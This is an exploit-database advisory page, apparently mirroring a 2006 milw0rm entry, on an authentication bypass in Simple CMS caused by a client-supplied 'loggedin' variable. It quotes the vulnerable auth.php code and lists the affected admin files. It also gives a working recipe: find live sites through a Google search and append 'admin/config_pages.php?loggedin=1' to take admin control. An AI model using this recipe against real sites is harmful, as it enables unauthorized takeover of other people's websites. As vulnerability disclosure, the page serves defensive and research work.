header-logo
Suggest Exploit
vendor:
Simple CMS
by:
daaan@gmail.com
7,5
CVSS
HIGH
Authentication Bypass
287
CWE
Product Name: Simple CMS
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Simple CMS

The cms from http://www.cms-center.com/ uses no security at all, just a boolean 'isloggedin'. If you submit 'loggedin=1' in the URL of any of the admin pages, you get full controll. The vulnerable code is present in the auth.php file and the vulnerable files are /admin/item_modify.php, /admin/item_list.php, /admin/item_legend.php, /admin/item_detail.php, /admin/index.php, /admin/config_pages.php, /admin/add_item1.php. Proof of the exploit can be found by Googling for 'powered by php mysql simple cms' and typing 'admin/config_pages.php?loggedin=1' behind the url.

Mitigation:

Ensure that authentication is properly implemented and enforced.
Source

Exploit-DB raw data:

Simple CMS <daaan@gmail.com>

Information:
The cms from http://www.cms-center.com/ uses no security at all, just a boolean 
"isloggedin". If you submit "loggedin=1" in the URL of any of the admin pages, 
you get full controll.

Vulnerable code:
<auth.php>
if ($loggedin != "1"){
	header("Location: /login.php?e=1"); /* Redirect browser */ 
	/* Make sure that code below does not get executed when we redirect. */ 
	exit; 
}
//echo "ok";

Vulnerable files:
/admin/item_modify.php
/admin/item_list.php
/admin/item_legend.php
/admin/item_detail.php
/admin/index.php
/admin/config_pages.php
/admin/add_item1.php

Proof:
1. Google for "powered by php mysql simple cms"
2. type "admin/config_pages.php?loggedin=1" behind the url
3. Done. It works on every admin page that uses the so called auth.php.

I tried to contact the author, but i was unable to find ANY contact info.

# milw0rm.com [2006-08-07]

Navigation

Suggest Exploit

Services By CQR